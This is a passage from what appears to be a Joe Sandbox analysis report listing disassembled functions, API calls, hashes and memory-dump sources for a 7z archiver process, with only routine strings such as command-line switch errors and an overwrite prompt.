                                                                                                                                                                                                • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                • Instruction ID: 583cadbc763b8e0dbc336036be0c259f1d688fc33ba3f9be9ce09ba514fba360
                                                                                                                                                                                                • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0F92224E9C081CA28FF32C4A5B2E6750FBCBF85F855061BB4E23711CE28C486C204
                                                                                                                                                                                                Function 0097324C Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                • Instruction ID: 52440530ce471c0e0886a216b3ac429729cb6355245e76440731f08200986181
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F0F92229EAC181CA28FF32C895F2F6760FBCBF81F855051BB4E63711CE28C486C604
                                                                                                                                                                                                Function 0097333D Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                • Instruction ID: a2a83000ba9bea525fe7d32c86189bf52ef69b4c3208dda6e1a68f7f2b27670a
                                                                                                                                                                                                • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                • Instruction Fuzzy Hash: DAF0D02225E5D085CA28FF32D4A5F6E67A1FFCBF81F855461BB4E53715CE28C446C604
                                                                                                                                                                                                Function 00972E29 Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                • Instruction ID: 76c82b5ea16d34326b28bb1993625167bbb0c0f6e53694fe527af25d7d480510
                                                                                                                                                                                                • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F0D02225E5D085CA28FF32D455F2E6791FFCBF81F456461BB4E63715CE28C446C604
                                                                                                                                                                                                Function 00972EDB Relevance: 10.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                • Instruction ID: d5530fe8d1b0cf41543caa00bd62298f57b94e1355430ac9a6040d0476cf0ecc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F0DA2225A9C085CA18FF32D461F2F63A0FFCBF81F816461BB4E63711CE28C486C609
                                                                                                                                                                                                Function 00972F97 Relevance: 10.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                • Instruction ID: a1e918b903a1bc2b94d69142d66f0fecc7dcac99c6c836583c0732191845a558
                                                                                                                                                                                                • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F09E2225E9D485CA18FF32D465F2E63A0FFCBF81F816461BB4E63715DE28C446C605
                                                                                                                                                                                                Function 0098B310 Relevance: 10.0, APIs: 8, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputsmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 469995913-0
                                                                                                                                                                                                • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                • Instruction ID: f2cbed872fc6e1b422509aff558104466b686f52719037e1ab2e4d39a7b21a0e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF0D62225958081C718FF31D891A2D2361FFCBF68B445261BF6D573AACE24C483C344
                                                                                                                                                                                                Function 00966484 Relevance: 9.2, APIs: 6, Instructions: 177COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmovewcscmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3584677832-0
                                                                                                                                                                                                • Opcode ID: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                • Instruction ID: 1106f5a0bb20a1c7885c6ee536d1e60edfe38392b7c06e9adb6917254233ee53
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6351D333201A8486CF20EF1AE4A166D7765F3D4B98B54C12AEB9E4B728DF35D986C700
                                                                                                                                                                                                Function 00941364 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 172COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                • API String ID: 1294909896-2104980125
                                                                                                                                                                                                • Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                • Instruction ID: 7ca36201d3b2d4b331ccbc15966d55094b0070f98a0f4013aa39e56dfa815662
                                                                                                                                                                                                • Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                • Instruction Fuzzy Hash: EF51C1622146D1A6CF30EF24D480BFD7765F3C2398F949622EA9A47756EB38C9C6C700
                                                                                                                                                                                                Function 00950358 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 009504EE
                                                                                                                                                                                                  • Part of subcall function 0094FEC8: _CxxThrowException.MSVCRT ref: 0094FF2F
                                                                                                                                                                                                  • Part of subcall function 0094FEC8: free.MSVCRT ref: 0094FFAE
                                                                                                                                                                                                  • Part of subcall function 0094FEC8: _CxxThrowException.MSVCRT ref: 0094FFD1
                                                                                                                                                                                                  • Part of subcall function 0094FEC8: _CxxThrowException.MSVCRT ref: 0094FFF7
                                                                                                                                                                                                  • Part of subcall function 0094FEC8: _CxxThrowException.MSVCRT ref: 0095002B
                                                                                                                                                                                                • free.MSVCRT ref: 00950523
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00950564
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$free
                                                                                                                                                                                                • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                • API String ID: 3129652135-1817034180
                                                                                                                                                                                                • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                • Instruction ID: a41ad6599e4238629316cb6d4b3cc61ebbb9ebb0865a1b96a7366e215f44bfc3
                                                                                                                                                                                                • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                • Instruction Fuzzy Hash: B45191232086D485CB20DF27E450BAEBB74F7C5B95F958116EF8907B65EB38C58ACB00
                                                                                                                                                                                                Function 0097E2F0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                • API String ID: 1534225298-1885708031
                                                                                                                                                                                                • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                • Instruction ID: 35627f539beff336da2938a571cf3d6e755aa92f1c3fb654ee0f1e33dfcb85fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: B8515327314B8482CB60DB26D48076E7765F7C9B94F588255EB9E47765DF3CC849C700
                                                                                                                                                                                                Function 00982688 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetstrlen$fputs
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2256168112-2735817509
                                                                                                                                                                                                • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                • Instruction ID: aae3c2e5721cd1c778412b95de3a6746670cd98defefdbe0772e3b487e31b95a
                                                                                                                                                                                                • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41D3737087C095CB34FB25E4543AE6BA5F7D5B88F485526DE8A07719CE78C585CB00
                                                                                                                                                                                                Function 00949828 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastfree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2167247754-0
                                                                                                                                                                                                • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                • Instruction ID: 34e009538fbd2e352c0933cacc922c3d3d5b7eed55536533123e790b88e3302f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                                                                                                                                                • Instruction Fuzzy Hash: D141A92222858496CA20EF14E491B6FB365F7D2760F904326EBED87BD9DF38C946D704
                                                                                                                                                                                                Function 00946A04 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$FileMove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 288606353-0
                                                                                                                                                                                                • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                • Instruction ID: 019cc37a865d2cb9b031cba2ed98301344d7170fd40b467ae35154d49f650875
                                                                                                                                                                                                • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7511B76324894045CA20EF25E850F6B5764EBC7BD0F54A221FFAA97365DE29CC86C701
                                                                                                                                                                                                Function 00947B70 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0094794C: FindClose.KERNELBASE ref: 0094795E
                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00947BAA
                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00947BB9
                                                                                                                                                                                                • FindFirstStreamW.KERNELBASE ref: 00947BDB
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00947BEA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4071060300-0
                                                                                                                                                                                                • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                • Instruction ID: 6a3f764d0f7a0a6ecc0617f89c710d9a42ec51a71543e7a1cf99b9eff72e26e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8021D332208B4482DA309B60E894B69A3A4FBDBB75F545320DEBA477E5DF3CC949C301
                                                                                                                                                                                                Function 0098CCF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0098CD2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                                                                                • API String ID: 2581285248-171671738
                                                                                                                                                                                                • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                • Instruction ID: 46307787e5176fbeaddf220ac4b4ce750b9d264a6caced3310072a2b33a86bbb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31A4A230894487EB34BB18D4A53692765F3847A5F880127EB5A077EBDB3CCCA5D721
                                                                                                                                                                                                Function 009411B8 Relevance: 8.8, APIs: 7, Instructions: 84COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                • Instruction ID: c55711ee33431129b6f12836ac2f37aa468d994dedfd0d74c0a50a4f85bde7f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
